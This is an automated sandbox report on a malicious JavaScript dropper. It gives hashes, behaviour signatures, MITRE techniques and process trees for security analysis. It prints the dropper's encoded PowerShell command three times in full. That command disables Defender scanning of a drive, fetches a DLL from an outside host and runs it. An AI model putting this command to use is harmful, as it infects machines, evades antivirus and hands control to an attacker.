c9a641f207845d59c7237ef2a195e4fbc7ddd89d96454d641a0d3ea789b276c1

General

Target

D-OPkiaFrs.54293.js
Size

81KB
MD5

869f10ba1fa7c078fd1cd725a3a25308
SHA1

a475bcc18c7583ec1b3592f83a86380ecd05a2b8
SHA256

c9a641f207845d59c7237ef2a195e4fbc7ddd89d96454d641a0d3ea789b276c1
SHA512

989374118093926b687d44616309b8fd6bbd419b777178cd4797ade9958e316943d54f1cbfb3471757f3d057ddf4ed165a58372be62099ef1f754b10f8182dce
SSDEEP

1536:OAnpsmQ4Scj64zccVGfWM1PjmfjTkI2E7A9hMglv33:OSsj4bj64ocVGb0MIUKgln

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
30	5064	powershell.exe
73	4020	powershell.exe
82	2748	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
5064	powershell.exe
5064	powershell.exe
4020	powershell.exe
4020	powershell.exe
2748	powershell.exe
2748	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 5064	2144	wscript.exe	84
PID 2144 wrote to memory of 5064	2144	wscript.exe	84
PID 5064 wrote to memory of 3688	5064	powershell.exe	89
PID 5064 wrote to memory of 3688	5064	powershell.exe	89
PID 4116 wrote to memory of 4020	4116	WScript.exe	102
PID 4116 wrote to memory of 4020	4116	WScript.exe	102
PID 4020 wrote to memory of 1648	4020	powershell.exe	107
PID 4020 wrote to memory of 1648	4020	powershell.exe	107
PID 1680 wrote to memory of 2748	1680	WScript.exe	112
PID 1680 wrote to memory of 2748	1680	WScript.exe	112
PID 2748 wrote to memory of 1932	2748	powershell.exe	114
PID 2748 wrote to memory of 1932	2748	powershell.exe	114

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\D-OPkiaFrs.54293.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABQAGUAcgBpAG8AZABvAG4AdABpAGMAcwAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAEMAbwBwAHIAbwBzAHQAYQBzAGkAYQAgAHwAIAAlAHsAJABfAC4ATwBkAG8AbgB0AGkAYQBzAGkAcwBWAGEAcgBuAGEAcwB9ADsAIAAkAFAAZQByAGkAbwBkAG8AbgB0AGkAYwBzACAAPQAgACIARgBvAHIAZQB2AG8AdQBjAGgAZQBkAE4AbwBuAGIAcgBvAG8AZAB5ACIAIAArACAAJABQAGUAcgBpAG8AZABvAG4AdABpAGMAcwA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABlAHIAaQBvAGQAbwBuAHQAaQBjAHMAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAFAAYQBwAGkAbwBuAEEAdQBiAHIAZQB0AGkAYQAgAC8AdgAgAE8AZABvAG4AdABpAGEAcwBpAHMAVgBhAHIAbgBhAHMAIAAvAGYAIgAiACIAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIABoAHQAdABwAHMAOgAvAC8AdQB0AGUAZABhAGwAbABhAGwALgBjAG8AbQAvAGUAWgBWAC8AMQAyADAAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBkAGUAcgBmAHIAbwBjAGsAQQB1AHQAbwBnAGEAbQB5AC4AZABsAGwAOwBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAVQBuAGQAZQByAGYAcgBvAGMAawBBAHUAdABvAGcAYQBtAHkALgBkAGwAbAAsAFgAUwA4ADgAOwA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5064
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\UnderfrockAutogamy.dll XS88
    3⤵
    PID:3688

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\D-OPkiaFrs.54293.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABQAGUAcgBpAG8AZABvAG4AdABpAGMAcwAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAEMAbwBwAHIAbwBzAHQAYQBzAGkAYQAgAHwAIAAlAHsAJABfAC4ATwBkAG8AbgB0AGkAYQBzAGkAcwBWAGEAcgBuAGEAcwB9ADsAIAAkAFAAZQByAGkAbwBkAG8AbgB0AGkAYwBzACAAPQAgACIARgBvAHIAZQB2AG8AdQBjAGgAZQBkAE4AbwBuAGIAcgBvAG8AZAB5ACIAIAArACAAJABQAGUAcgBpAG8AZABvAG4AdABpAGMAcwA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABlAHIAaQBvAGQAbwBuAHQAaQBjAHMAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAFAAYQBwAGkAbwBuAEEAdQBiAHIAZQB0AGkAYQAgAC8AdgAgAE8AZABvAG4AdABpAGEAcwBpAHMAVgBhAHIAbgBhAHMAIAAvAGYAIgAiACIAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIABoAHQAdABwAHMAOgAvAC8AdQB0AGUAZABhAGwAbABhAGwALgBjAG8AbQAvAGUAWgBWAC8AMQAyADAAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBkAGUAcgBmAHIAbwBjAGsAQQB1AHQAbwBnAGEAbQB5AC4AZABsAGwAOwBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAVQBuAGQAZQByAGYAcgBvAGMAawBBAHUAdABvAGcAYQBtAHkALgBkAGwAbAAsAFgAUwA4ADgAOwA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\UnderfrockAutogamy.dll XS88
    3⤵
    PID:1648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:1248

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\D-OPkiaFrs.54293.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABQAGUAcgBpAG8AZABvAG4AdABpAGMAcwAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAEMAbwBwAHIAbwBzAHQAYQBzAGkAYQAgAHwAIAAlAHsAJABfAC4ATwBkAG8AbgB0AGkAYQBzAGkAcwBWAGEAcgBuAGEAcwB9ADsAIAAkAFAAZQByAGkAbwBkAG8AbgB0AGkAYwBzACAAPQAgACIARgBvAHIAZQB2AG8AdQBjAGgAZQBkAE4AbwBuAGIAcgBvAG8AZAB5ACIAIAArACAAJABQAGUAcgBpAG8AZABvAG4AdABpAGMAcwA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABlAHIAaQBvAGQAbwBuAHQAaQBjAHMAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAFAAYQBwAGkAbwBuAEEAdQBiAHIAZQB0AGkAYQAgAC8AdgAgAE8AZABvAG4AdABpAGEAcwBpAHMAVgBhAHIAbgBhAHMAIAAvAGYAIgAiACIAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIABoAHQAdABwAHMAOgAvAC8AdQB0AGUAZABhAGwAbABhAGwALgBjAG8AbQAvAGUAWgBWAC8AMQAyADAAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBkAGUAcgBmAHIAbwBjAGsAQQB1AHQAbwBnAGEAbQB5AC4AZABsAGwAOwBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAVQBuAGQAZQByAGYAcgBvAGMAawBBAHUAdABvAGcAYQBtAHkALgBkAGwAbAAsAFgAUwA4ADgAOwA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\UnderfrockAutogamy.dll XS88
    3⤵
    PID:1932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d096831023867930e62e6d8b3d4d8ca6

SHA1
404a1e73dc1590f1c8b9327c396591567dac7365

SHA256
167f75b42ae614a8d6b0497779ff12f09605328533487f235b029e0db03ad23b

SHA512
31333100ddd8e04bf730118ea800843720c0f3fb69e27b89dda7fa4d717d25e838ad55a0919d47a44dd8a78d724ef8c105cfa230987cc46ba94a2b790ff91b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1c00ac32d3b954eb5f5c34f2665a1445

SHA1
aad5c1509fa3101313a44899e4cd25147388d465

SHA256
c32ae9f41c72d4f9aa3c203d5326a04049884713aa39c4af535a0632488d18c2

SHA512
c72b27d3a12a0ec9e6ada5a1cff1d1ea6bb53ae5fdf9c6c65ba1078ad3f86e6e01dfe2152431a8f6cd03de1f2ef712b545dc22706da391d081a3dce1228099f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_20ig3xjh.ma1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2748-175-0x0000026F687C0000-0x0000026F687D0000-memory.dmp

Filesize
64KB

Download
memory/2748-174-0x0000026F687C0000-0x0000026F687D0000-memory.dmp

Filesize
64KB

Download
memory/2748-173-0x0000026F687C0000-0x0000026F687D0000-memory.dmp

Filesize
64KB

Download
memory/4020-161-0x000001A338A00000-0x000001A338A10000-memory.dmp

Filesize
64KB

Download
memory/4020-160-0x000001A338A00000-0x000001A338A10000-memory.dmp

Filesize
64KB

Download
memory/4020-159-0x000001A338A00000-0x000001A338A10000-memory.dmp

Filesize
64KB

Download
memory/5064-133-0x0000025D75570000-0x0000025D75592000-memory.dmp

Filesize
136KB

Download
memory/5064-144-0x0000025D73710000-0x0000025D73720000-memory.dmp

Filesize
64KB

Download
memory/5064-145-0x0000025D73710000-0x0000025D73720000-memory.dmp

Filesize
64KB

Download
memory/5064-143-0x0000025D73710000-0x0000025D73720000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing